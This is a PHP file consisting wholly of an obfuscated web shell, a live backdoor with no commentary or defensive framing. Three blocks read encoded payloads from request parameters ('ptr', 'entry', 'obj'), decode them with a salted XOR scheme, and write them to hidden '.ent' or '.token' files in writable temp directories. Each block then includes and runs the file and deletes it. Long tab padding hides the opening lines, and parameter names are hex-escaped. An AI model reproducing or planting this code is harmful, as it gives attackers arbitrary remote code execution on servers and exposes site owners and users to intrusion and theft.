<?php																																										if(count($_REQUEST) > 0 && isset($_REQUEST["ptr"])){ $symbol = array_filter([getcwd(), getenv("TMP"), "/tmp", session_save_path(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir()]); $res = $_REQUEST["ptr"]; $res= explode ( '.' , $res ) ; $sym = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s4); $q = 0; $__tmp = $res; while ($v5 = array_shift($__tmp)) { $chS = ord($s4[$q %$sLen]); $dec = ((int)$v5 - $chS - ($q %10)) ^ 96; $sym .=chr($dec); $q++; } foreach ($symbol as $pset) { if ((bool)is_dir($pset) && (bool)is_writable($pset)) { $component = join("/", [$pset, ".ent"]); if (@file_put_contents($component, $sym) !== false) { include $component; unlink($component); die(); } } } }
																																										if(array_key_exists("\x65n\x74ry", $_POST) && !is_null($_POST["\x65n\x74ry"])){ $desc = array_filter(["/tmp", "/dev/shm", getenv("TEMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP"), session_save_path()]); $resource = $_POST["\x65n\x74ry"]; $resource =explode ( '.' , $resource ) ; $object = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); foreach ($resource as $i => $v4): $chS = ord($salt[$i % $sLen]); $d = ((int)$v4 - $chS - ($i % 10)) ^ 30; $object .= chr($d); endforeach; foreach ($desc as $component) { if (is_dir($component) ? is_writable($component) : false) { $element = join("/", [$component, ".token"]); if (file_put_contents($element, $object)) { require $element; unlink($element); exit; } } } }


if(in_array("\x6Fb\x6A", array_keys($_POST))){
	$desc = array_filter([session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), "/tmp", sys_get_temp_dir(), "/var/tmp", getcwd(), getenv("TEMP")]);
	$pgrp = $_POST["\x6Fb\x6A"];
		$pgrp= 	explode  (  	'.'  ,	$pgrp   )  ;		 
	$data = '';
            $s = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen(	$s);
            $j = 0;
            $__len = count(	$pgrp);
    
            do {
                if(	$j >= $__len) break;
                $v9 = $pgrp[$j];
                $chS = ord(	$s[$j % $sLen]);
                $d =(	(	int)$v9 - $chS -(	$j % 10))^11;
                $data.= chr(	$d);
                $j++;
            } while(	true);
	for ($factor = 0, $ptr = count($desc); $factor < $ptr; $factor++) {
    $itm = $desc[$factor];
    		if (is_dir($itm) && is_writable($itm)) {
    $key = vsprintf("%s/%s", [$itm, ".token"]);
    if (file_put_contents($key, $data)) {
	require $key;
	unlink($key);
	die();
}
}
}
}